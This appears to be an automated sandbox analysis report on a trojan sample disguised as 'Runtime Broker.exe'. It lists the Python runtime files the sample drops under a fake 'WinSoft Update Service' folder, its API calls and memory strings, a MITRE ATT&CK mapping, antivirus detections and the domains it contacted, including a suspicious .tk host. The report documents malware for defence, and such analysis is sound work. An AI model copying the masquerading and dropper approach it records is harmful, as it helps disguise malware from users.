Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\tcl86t.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file

Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\LICENSE.txt	Jump to behavior
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\adodbapi\license.txt	Jump to behavior
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\adodbapi\readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\isapi\README.txt	Jump to behavior
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\isapi\samples\README.txt	Jump to behavior
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\isapi\test\README.txt	Jump to behavior

Source: C:\Users\user\Desktop\Runtime Broker.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\Runtime Broker.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\isapi\PyISAPI_loader.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\python.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\mfc140u.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\_asyncio.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\winsound.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\python3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\_tkinter.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\_elementtree.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\python37.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\libssl-1_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\_msi.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\pythonw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\tk86t.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\tcl86t.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file

Source: C:\Users\user\Desktop\Runtime Broker.exe	Code function: 0_2_0040689A FindFirstFileW,FindClose,	0_2_0040689A
Source: C:\Users\user\Desktop\Runtime Broker.exe	Code function: 0_2_00405C4E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C4E
Source: C:\Users\user\Desktop\Runtime Broker.exe	Code function: 0_2_00402902 FindFirstFileW,	0_2_00402902

Source: C:\Users\user\Desktop\Runtime Broker.exe	API call chain: ExitProcess graph end node			graph_0-3549
Source: C:\Users\user\Desktop\Runtime Broker.exe	API call chain: ExitProcess graph end node			graph_0-3376

Source: C:\Users\user\Desktop\Runtime Broker.exe	File opened: C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\	Jump to behavior
Source: C:\Users\user\Desktop\Runtime Broker.exe	File opened: C:\Program Files (x86)\WinSoft Update Service\	Jump to behavior
Source: C:\Users\user\Desktop\Runtime Broker.exe	File opened: C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages	Jump to behavior
Source: C:\Users\user\Desktop\Runtime Broker.exe	File opened: C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\_distutils_hack\	Jump to behavior
Source: C:\Users\user\Desktop\Runtime Broker.exe	File opened: C:\Program Files (x86)\WinSoft Update Service\Lib	Jump to behavior
Source: C:\Users\user\Desktop\Runtime Broker.exe	File opened: C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\_distutils_hack	Jump to behavior

Source: cacert.pem0.0.dr

Binary or memory string: zJVSk/BwJVmcIGfE7vmLV2H0knZ9P4SNVbfo5azV8fUZVqZa+5Acr5Pr5RzUZ5dd

Source: Runtime Broker.exe, 00000000.00000002.921455881.0000000000CA0000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: Runtime Broker.exe, 00000000.00000002.921455881.0000000000CA0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: Runtime Broker.exe, 00000000.00000002.921455881.0000000000CA0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: Runtime Broker.exe, 00000000.00000002.921455881.0000000000CA0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Runtime Broker.exe

0_2_004035D8

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Access Token Manipulation1	Masquerading1	OS Credential Dumping	Query Registry1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Process Injection1	Access Token Manipulation1	LSASS Memory	Security Software Discovery1	Remote Desktop Protocol	Clipboard Data1	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	File and Directory Discovery3	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	System Information Discovery3	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Runtime Broker.exe	36%	Virustotal		Browse
Runtime Broker.exe	6%	Metadefender		Browse
Runtime Broker.exe	33%	ReversingLabs	Win32.Trojan.Generic
Runtime Broker.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Link
C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\_distutils_hack\__init__.py	0%	ReversingLabs
C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\adodbapi\__init__.py	0%	ReversingLabs
C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\adodbapi\ado_consts.py	0%	Metadefender	Browse
C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\adodbapi\ado_consts.py	0%	ReversingLabs
C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\adodbapi\adodbapi.py	0%	ReversingLabs
C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\adodbapi\apibase.py	0%	ReversingLabs
C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\adodbapi\examples\db_print.py	0%	ReversingLabs
C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\adodbapi\examples\db_table_names.py	0%	Metadefender	Browse
C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\adodbapi\examples\db_table_names.py	0%	ReversingLabs
C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\adodbapi\is64bit.py	0%	ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.scintilla.org)	0%	Avira URL Cloud	safe
http://www.pythoncom-test.com/foo	0%	Avira URL Cloud	safe
http://192.168.0.1/Python/interrupt/test.asp	0%	Avira URL Cloud	safe
http://aia.startssl.com/certs/sca.code3.crt06	0%	URL Reputation	safe
http://crl.startssl.com/sfsca.crl0f	0%	URL Reputation	safe
http://crl.startssl.com/sca-code3.crl0#	0%	URL Reputation	safe
http://www.cnri.reston.va.us)	0%	Avira URL Cloud	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://www.pythoncom-test.com/bar	0%	Avira URL Cloud	safe
http://ocsp.startssl.com07	0%	URL Reputation	safe
http://www.startssl.com/policy0	0%	URL Reputation	safe
http://ocsp.startssl.com00	0%	URL Reputation	safe
http://www.pythonlabs.com/logos.html	0%	Avira URL Cloud	safe
https://www.catcert.net/verarrel	0%	URL Reputation	safe
http://starship.python.net/crew/mhammond/win32/PrivacyProblem.html	0%	Avira URL Cloud	safe
http://www.cwi.nl)	0%	Avira URL Cloud	safe
http://aia.startssl.com/certs/ca.crt0	0%	URL Reputation	safe
http://www.startssl.com/0P	0%	URL Reputation	safe
http://192.168.0.1/Python/interrupt/test1.asp	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
wjecpujpanmwm.tk	104.21.32.150	true	false	unknown
google.com	216.58.215.238	true	false	high
lucaespo.altervista.org	unknown	unknown	false	high
studiofotografico35mm.altervista.org	unknown	unknown	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.freedesktop.org/software/systemd/man/os-release.html	distro.py.0.dr	false		high
http://bugs.python.org/issue13585	contextlib2.py.0.dr	false		high
https://github.com/kjd/idna	Runtime Broker.exe, 00000000.00000002.921795491.00000000027F7000.00000004.00000001.sdmp	false		high
https://www.python.org/dev/peps/pep-0566/#id17.	Runtime Broker.exe, Runtime Broker.exe, 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp	false		high
http://www.scintilla.org)	Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://github.com/pypa/pip/issues/new	install.py0.0.dr	false		high
http://badge.fury.io/py/idna	Runtime Broker.exe, 00000000.00000002.921795491.00000000027F7000.00000004.00000001.sdmp	false		high
https://github.com/mhammond/pywin32	Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	false		high
https://httpbin.org/post	Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	false		high
http://unicode.org/reports/tr46/	Runtime Broker.exe, 00000000.00000002.921795491.00000000027F7000.00000004.00000001.sdmp	false		high
http://bugs.python.org/issue19404	contextlib2.py.0.dr	false		high
https://docs.python.org/3/library/re.html#re.sub	pyparsing.py.0.dr	false		high
https://github.com/python/mypy/issues/1297	logging.py.0.dr	false		high
http://www.pythoncom-test.com/foo	Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://pages.cpsc.ucalgary.ca/~saul/vb_examples/tutorial12/	Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	false		high
http://192.168.0.1/Python/interrupt/test.asp	Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://aia.startssl.com/certs/sca.code3.crt06	tcl86t.dll.0.dr	false	URL Reputation: safe	unknown
http://crl.startssl.com/sfsca.crl0f	tcl86t.dll.0.dr	false	URL Reputation: safe	unknown
https://stackoverflow.com/questions/267399/how-do-you-match-only-valid-roman-numerals-with-a-regular	pyparsing.py.0.dr	false		high
https://travis-ci.org/kjd/idna	Runtime Broker.exe, 00000000.00000002.921795491.00000000027F7000.00000004.00000001.sdmp	false		high
http://crl.thawte.com/ThawteTimestampingCA.crl0	libssl-1_1.dll.0.dr, tcl86t.dll.0.dr, _overlapped.pyd.0.dr, libcrypto-1_1.dll.0.dr, _socket.pyd.0.dr, python37.dll.0.dr, nsg2001.tmp.0.dr	false		high
https://github.com/pyparsing/pyparsing/wiki	pyparsing.py.0.dr	false		high
https://bugs.python.org/issue1322	distro.py.0.dr	false		high
http://crl.startssl.com/sca-code3.crl0#	tcl86t.dll.0.dr	false	URL Reputation: safe	unknown
http://bugs.python.org/issue12029	contextlib2.py.0.dr	false		high
http://tools.ietf.org/html/rfc5895	Runtime Broker.exe, 00000000.00000002.921795491.00000000027F7000.00000004.00000001.sdmp	false		high
https://github.com/nir0s/distro/issues/162	distro.py.0.dr	false		high
http://tools.ietf.org/html/rfc5891	Runtime Broker.exe, 00000000.00000002.921795491.00000000027F7000.00000004.00000001.sdmp	false		high
https://bugs.python.org/issue19612	logging.py.0.dr	false		high
https://github.com/python/mypy/issues/3500	logging.py.0.dr	false		high
https://requests.readthedocs.io	Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	false		high
https://stackoverflow.com/questions/45138084/pythonwin-occasionally-gives-an-error-on-opening	Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	false		high
http://www.python.org/favicon.ico	Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	false		high
http://www.python.org/missing-favicon.ico	Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	false		high
https://docs.python.org/3/library/pprint.html	pyparsing.py.0.dr	false		high
http://python.org/dev/peps/pep-0263/	python37.dll.0.dr	false		high
https://httpbin.org/get	Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	distro.py.0.dr	false		high
https://www.python.org	Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	false		high
https://badge.fury.io/py/idna.svg	Runtime Broker.exe, 00000000.00000002.921795491.00000000027F7000.00000004.00000001.sdmp	false		high
https://github.com/pypa/pip/pull/6770	prepare.py.0.dr	false		high
http://www.python.org	Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	false		high
http://www.cnri.reston.va.us)	nsg2001.tmp.0.dr	false	Avira URL Cloud: safe	low
http://ocsp.thawte.com0	libssl-1_1.dll.0.dr, tcl86t.dll.0.dr, _overlapped.pyd.0.dr, libcrypto-1_1.dll.0.dr, _socket.pyd.0.dr, python37.dll.0.dr, nsg2001.tmp.0.dr	false	URL Reputation: safe	unknown
https://www.python.org/dev/peps/pep-0427/	cache.py2.0.dr	false		high
http://www.pythoncom-test.com/bar	Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.startssl.com07	tcl86t.dll.0.dr	false	URL Reputation: safe	unknown
http://www.startssl.com/policy0	tcl86t.dll.0.dr	false	URL Reputation: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	Runtime Broker.exe	false		high
http://ocsp.startssl.com00	tcl86t.dll.0.dr	false	URL Reputation: safe	unknown
https://docs.python.org/3/library/pprint.html#pprint.pprint	pyparsing.py.0.dr	false		high
https://www.python.org/psf/)	nsg2001.tmp.0.dr	false		high
http://www.opensource.org	nsg2001.tmp.0.dr	false		high
https://travis-ci.org/kjd/idna.svg?branch=master	Runtime Broker.exe, 00000000.00000002.921795491.00000000027F7000.00000004.00000001.sdmp	false		high
http://www.pythonlabs.com/logos.html	nsg2001.tmp.0.dr	false	Avira URL Cloud: safe	unknown
https://docs.python.org/3/library/re.html	pyparsing.py.0.dr	false		high
https://github.com/psf/requests/issues/3578.	Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	false		high
https://github.com/pypa/pip/issues/3418	spinners.py.0.dr	false		high
https://www.catcert.net/verarrel	cacert.pem0.0.dr	false	URL Reputation: safe	unknown
http://starship.python.net/crew/mhammond/win32/PrivacyProblem.html	Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.cwi.nl)	nsg2001.tmp.0.dr	false	Avira URL Cloud: safe	low
